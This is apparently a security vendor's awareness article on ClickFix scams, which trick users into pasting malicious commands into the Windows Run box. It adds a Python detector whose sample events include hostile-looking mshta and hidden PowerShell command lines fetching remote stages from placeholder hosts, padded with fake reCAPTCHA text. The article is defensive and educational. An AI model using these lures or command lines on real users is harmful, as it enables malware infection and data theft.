ClickFix Scams Target Computer Users Across Industries and Borders
Fake CAPTCHA screens, document error alerts, and phony Facebook messages infect user PCs with data-stealing malware
A clever new cyberscam is wreaking havoc among businesses, hospitality venues, healthcare providers, and other organizations. The scam uses the psychology of social engineering to exploit our human desire to fix little computer problems ourselves, rather than calling IT or opening a ticket. Instead, a pop-up screen on your computer offers simple instructions to fix the document, reload the webpage, or simply prove you are not a robot. Sounds easy enough for the typical computer user, right?
In truth, the easy part is falling for the scam. And no computer user is safe.
Social Engineering: Bad and Getting Worse
Human vulnerabilities, leading to human failures, were responsible for more than two thirds (68%) of all known data breaches in 2024. Rather than being malicious or deliberate, these failures resulted from employees falling for social engineering tricks and making human errors that affected company security, according to the 2024 Data Breach Investigations Report from Verizon.
Social engineering schemes are effective because they prey on our human vulnerabilities, and because they play a numbers game. Like hacking and ransomware, the vast majority of social engineering schemes are financially motivated, delivering easy profits and repeatable successes for their perpetrators. The more individuals a scammer targets, the more victims the scheme exploits, and the greater the profits for the scammer.
On the user side, nobody wants to be the hapless victim. Who really wants to be the one who downloaded the malware? The one who infected their computer, or their local area network? Of course, nobody does. And yet it happens every single day.
Employees everywhere need to be aware of this latest social engineering scam to avoid becoming the next unwitting victim. CISOs, security managers, and IT teams need to organize cybersecurity training for their organizations’ employees—and they need to include how to spot and avoid ClickFix scams.
For Users: How ClickFix Works and What to Watch For
ClickFix deceives users into downloading and running malware on their computers. Because the victim, not the browser, carries out the download, the scam slips past web browser security features such as Google Safe Browsing, and the absence of any warning makes it appear legitimate to uninformed computer users.
An article in InfoSecurity Magazine in November 2024 described how ClickFix scammers create fake error messages that include instructions for users to fix the ‘error’ by simply copying, pasting, and launching specified commands. Following those steps downloads malware onto the users’ computers, and they may not even know it.
In some ClickFix scams, users think they are visiting a specific website but are actually on a fake website that is impersonating (or spoofing) a legitimate site. As the user browses, the fake website displays a phony alert message.
Typically, the message warns the user that the webpage or document cannot be displayed correctly, or asks the user to verify they are not a robot before continuing.
In the case of the error message, a Windows user may be instructed to click the “Fix It” button and follow the simple outlined steps. In the case of the robot message, the user sees a fake popup that looks like a CAPTCHA request. Pressing the blue button displays a second popup with three easy, but disastrous, verification steps for users to follow:
- First, press the keyboard key with the Windows icon and the letter “R” at the same time. This opens a Windows Run prompt that will execute any specified program that is already installed on the system.
- Then, press the CTRL key and the letter “V” at the same time. This pastes the malicious command that the fake web page silently placed on the system clipboard.
- Finally, press the Enter key, which causes Windows to download and launch the ClickFix malware through a Windows program (mshta.exe) designed to run Microsoft HTML application files. And let the games begin!
Popular Targets for ClickFix Scams
According to an alert issued by the HHS Health Sector Cybersecurity Coordination Center in October 2024, analysis of the ClickFix malware distribution system found attackers targeting users who browse online for games, PDF readers, Web3 web browsers, and messaging apps, as well as users of the Zoom video conferencing app and the Booking.com app. It also warned that ClickFix scammers continue to devise new variations, such as fake Google Chrome error pages and popups that spoof Facebook, among others. In any of its forms, the ClickFix scam leads to bad outcomes, with users unwittingly copying and executing malicious code that installs malware on their computers and steals their data.
Numerous ClickFix scams use phishing emails that include HTML attachments that spoof Microsoft Office files. When the attachment is opened, the user sees an image of a Microsoft Word document with a pop-up error message instructing them to click the How to Fix button to take care of the problem quickly and easily.
ClickFix scammers especially like phishing in hospitality industry waters by impersonating Booking.com, infecting users of the popular online travel platform with malware that steals financial information from guests. According to Microsoft, attackers send malicious emails that impersonate Booking.com and mention believable tidbits like guest reviews, requests from prospective guests, or online promotions to lure individuals into falling for one of the ClickFix variations. Attackers are continuing to target hospitality organizations throughout North America, Europe, Oceania, and Southeast Asia that are likely to use the online travel platform.
Why ClickFix Keeps Evolving
ClickFix is able to bypass conventional and automated security features, according to the InfoSecurity article, because the ClickFix model prompts computer users to infect themselves with malware by following simple, believable steps.
Due to this appealing feature, and because ClickFix has proven to be a highly effective way to deploy malware that steals information, including financial data, phishing schemers are escalating their use of ClickFix.
This means that ClickFix tactics will keep evolving as cybercriminals look for ways to continue exploiting users for fun and profit. When successful scams are this simple and adaptable, no bad actor will walk away from such easy financial gain.
For Techs: How ClickFix Works
The ClickFix scam has been investigated by Microsoft, Proofpoint, and other tech firms and described in a number of security articles and bulletins. Cybercriminals initiate the scams by using stolen credentials to log into websites and install fake plugins in the compromised environments. Once installed, the plugins inject malicious JavaScript that contains a known variation of fake browser update malware. The malware uses blockchain and smart contracts to obtain malicious payloads in a practice known as EtherHiding.
When executed in the browser, JavaScript presents users with fake browser update notifications that guide them to install malware on their computer. The malware usually consists of remote access trojans and various infostealers, such as Vidar Stealer, DarkGate, and Lumma Stealer.
The ClickFix scam targeting Booking.com began in December 2024, and Microsoft Threat Intelligence has traced it to a threat cluster known as Storm-1865. Rather extensive analysis by Proofpoint noted numerous ClickFix campaigns conducted by a variety of bad actors dating to March 2024. According to that analysis, much of the ClickFix activity impersonating CAPTCHA (“Verify You Are Human”) uses an open source toolkit called reCAPTCHA Phish, which was found to be available on GitHub in September 2024. GitHub is a proprietary platform that allows developers to create, store, manage, and share their code using distributed version control.
On September 18, Proofpoint identified a campaign that used GitHub notifications to deliver malware, with the threat actor either commenting on or creating an issue in a GitHub repository. That action led to the repository owner, issue owner, or other collaborators receiving a fake security warning from GitHub. The warning contained a link to a phony GitHub website, which used reCAPTCHA Phish and ClickFix to trick users into executing a PowerShell command on their computers.
The fake GitHub landing page contained verification steps that would lead to the execution of PowerShell code and installation of Lumma Stealer in order to pilfer data. The landing page also contained a fake reCAPTCHA message at the end of the copied command to avoid the malicious command being visible in the run-box, according to Proofpoint.
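As an added example (not from the article, nor from Microsoft or Proofpoint), the following Python scans process-creation events for the chain described in the user steps above and in Proofpoint's findings: a script interpreter such as mshta.exe or powershell.exe launched under explorer.exe (where a Run-box command lands), a remote URL in the command line, and CAPTCHA-style padding appended to hide the real command. The event field names, the example.invalid URLs, and all sample command lines are constructed assumptions.

```python
import re

# Constructed sample process-creation events (not from the article). Field names
# loosely mirror what a Sysmon/EDR process-creation log carries.
SAMPLE_EVENTS = [
    {"parent": "explorer.exe", "image": "mshta.exe",
     "cmdline": "mshta.exe https://example.invalid/verify.hta "
                "# I am not a robot - reCAPTCHA Verification ID: 0000"},
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -WindowStyle Hidden -Command "
                "\"<placeholder stage-download> https://example.invalid/stage\""},
    {"parent": "outlook.exe", "image": "winword.exe", "cmdline": "winword.exe report.docx"},
    {"parent": "explorer.exe", "image": "notepad.exe", "cmdline": "notepad.exe notes.txt"},
]

# The Win+R Run box is hosted by explorer.exe, so the interpreter started by the
# pasted command appears as its child. Double-clicked shortcuts do too, which is
# why one indicator alone is not enough to alert on.
RUN_BOX_PARENT = "explorer.exe"
INTERPRETERS = {"mshta.exe", "powershell.exe", "pwsh.exe", "cmd.exe"}
URL_RE = re.compile(r"https?://", re.IGNORECASE)
HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+hidden", re.IGNORECASE)
# Padding text that pushes the real command out of the narrow Run box.
CAPTCHA_PAD_RE = re.compile(r"not a robot|recaptcha|verification id", re.IGNORECASE)


def score_event(event):
    """Return the list of ClickFix indicators present in one process-creation event."""
    reasons = []
    cmd = event["cmdline"]
    if event["parent"].lower() == RUN_BOX_PARENT and event["image"].lower() in INTERPRETERS:
        reasons.append("script interpreter launched from explorer.exe (Run box)")
    if URL_RE.search(cmd):
        reasons.append("remote URL in command line")
    if HIDDEN_RE.search(cmd):
        reasons.append("hidden window requested")
    if CAPTCHA_PAD_RE.search(cmd):
        reasons.append("CAPTCHA-style padding text in command line")
    return reasons


def find_clickfix_candidates(events, min_indicators=2):
    """Flag events that stack at least min_indicators ClickFix indicators."""
    hits = []
    for event in events:
        reasons = score_event(event)
        if len(reasons) >= min_indicators:
            hits.append((event["image"], reasons))
    return hits


if __name__ == "__main__":
    for image, reasons in find_clickfix_candidates(SAMPLE_EVENTS):
        print(f"ALERT {image}: {'; '.join(reasons)}")
```

On a real endpoint the same indicators can be corroborated against the per-user Run-box history kept under the HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU registry key, which records what was typed or pasted into Win+R.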
What Employers and Users Should Do Now
ClickFix is a phishing exploit, which by its nature uses social engineering to trick users into careless cyber behavior. As with most threats, knowledge is power, and users who have been informed about ClickFix and how it works are better able to avoid becoming victims. Employers play a vital role in educating their employees in order to prevent damages from the scam.
Action 1: Educate users to modify behaviors. Organizations with training departments should already be providing cybersecurity training to all employees, including management, on an annual basis at minimum. Be sure that phishing schemes feature prominently in the training, with descriptions and examples of the most common and emerging schemes to help users spot those tricks. When a new exploit becomes known, send email alerts to employees to raise awareness and vigilance. Post bulletins in common areas and on internal company news platforms.
Organizations that do not have in-house training teams can use expert third-party resources that specialize in cybersecurity awareness training with emphasis on phishing and other social engineering schemes. 24By7Security offers this training content along with various delivery methods.
Simple User Tip: An easy way to detect potential phishing emails is to hover your cursor over the sender’s email address. Does that email address match what’s displayed in the From field? Does it look suspicious for any other reason? Employees should always check the sender’s email address to verify its authenticity. It only takes a second.
Action 2: Utilize tools that detect phishing schemes. To detect and prevent phishing schemes, organizations can use tools such as email filters, antivirus and antimalware software, authentication solutions, and phishing simulation platforms, as a few examples. AI-powered solutions that analyze emails and websites for suspicious patterns are also available, as are various email threat scanning tools that detect vulnerabilities in Microsoft products.
Before installing any such tools, try to confirm whether they are effective in detecting and preventing ClickFix popups and ClickFix malware, bearing in mind that ClickFix is known to be able to bypass conventional and automated security features.
Summary
Social engineering and phishing scams are here to stay due to the relative ease with which human vulnerabilities can be exploited. The ClickFix scam is fairly new on the scene and is already evolving to deliver a greater variety of fix-it-yourself choices for users to click. Increasing cybersecurity awareness among employees, and requiring ongoing training that includes phishing scams, are two tactics that can be highly effective in any organization, especially when combined with proven security technologies and robust cybersecurity practices. Contact a cybersecurity expert for next steps to secure your organization.